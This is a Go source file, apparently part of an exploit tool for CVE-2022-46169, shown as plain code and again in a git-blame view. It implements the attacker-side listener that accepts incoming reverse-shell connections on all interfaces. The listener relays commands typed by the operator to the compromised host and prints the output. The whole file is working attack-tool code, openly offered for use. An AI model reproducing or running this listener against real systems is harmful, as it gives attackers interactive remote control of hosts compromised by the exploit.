cve-2022-46169/internal/listener/listener.go

package listener

import (
	"fmt"
	"io"
	"net"
	"os"
)

func handleConnection(conn net.Conn) {
	defer conn.Close()

	fmt.Println("Connection established. Interacting with reverse shell...")
	fmt.Println("Press enter once if prompt does not show up.")

	for {
		var cmd string
		fmt.Scanln(&cmd)

		// send the command to the reverse shell
		_, err := conn.Write([]byte(cmd + "\n"))
		if err != nil {
			fmt.Println("Error sending command:", err)
			return
		}

		// read the response from the reverse shell
		buf := make([]byte, 1024)
		n, err := conn.Read(buf)
		if err != nil && err != io.EOF {
			fmt.Println("Error reading from connection:", err)
			return
		}

		// print the reverse shell output
		fmt.Print(string(buf[:n]))
	}
}

func startListener(lhost, lport string) {
	listenAddress := fmt.Sprintf("%s:%s", lhost, lport)
	listener, err := net.Listen("tcp", listenAddress)
	if err != nil {
		fmt.Println("Error starting listener:", err)
		os.Exit(1)
	}
	defer listener.Close()

	fmt.Printf("Listening for reverse shell on %s:%s...\n", lhost, lport)

	// accept incoming connections and handle them
	for {
		conn, err := listener.Accept()
		if err != nil {
			fmt.Println("Error accepting connection:", err)
			continue
		}

		// handle the connection in a new goroutine
		go handleConnection(conn)
	}
}

func Listen(lport string) {
	// listen on everything, lazy
	lhost := "0.0.0.0"

	startListener(lhost, lport)
}
added listener + subroutines 2025-01-24 11:01:46 +08:00			`package listener`

			`import (`
			`"fmt"`
			`"io"`
			`"net"`
			`"os"`
			`)`

			`func handleConnection(conn net.Conn) {`
			`defer conn.Close()`

			`fmt.Println("Connection established. Interacting with reverse shell...")`
updated prompt logic 2025-01-24 11:15:12 +08:00			`fmt.Println("Press enter once if prompt does not show up.")`
added listener + subroutines 2025-01-24 11:01:46 +08:00
			`for {`
			`var cmd string`
			`fmt.Scanln(&cmd)`

			`// send the command to the reverse shell`
			`_, err := conn.Write([]byte(cmd + "\n"))`
			`if err != nil {`
			`fmt.Println("Error sending command:", err)`
			`return`
			`}`

			`// read the response from the reverse shell`
			`buf := make([]byte, 1024)`
			`n, err := conn.Read(buf)`
			`if err != nil && err != io.EOF {`
			`fmt.Println("Error reading from connection:", err)`
			`return`
			`}`

			`// print the reverse shell output`
			`fmt.Print(string(buf[:n]))`
			`}`
			`}`

			`func startListener(lhost, lport string) {`
			`listenAddress := fmt.Sprintf("%s:%s", lhost, lport)`
			`listener, err := net.Listen("tcp", listenAddress)`
			`if err != nil {`
			`fmt.Println("Error starting listener:", err)`
			`os.Exit(1)`
			`}`
			`defer listener.Close()`

			`fmt.Printf("Listening for reverse shell on %s:%s...\n", lhost, lport)`

			`// accept incoming connections and handle them`
			`for {`
			`conn, err := listener.Accept()`
			`if err != nil {`
			`fmt.Println("Error accepting connection:", err)`
			`continue`
			`}`

			`// handle the connection in a new goroutine`
			`go handleConnection(conn)`
			`}`
			`}`

used a global flag system 2025-01-24 11:10:16 +08:00			`func Listen(lport string) {`
added listener + subroutines 2025-01-24 11:01:46 +08:00			`// listen on everything, lazy`
			`lhost := "0.0.0.0"`

			`startListener(lhost, lport)`
			`}`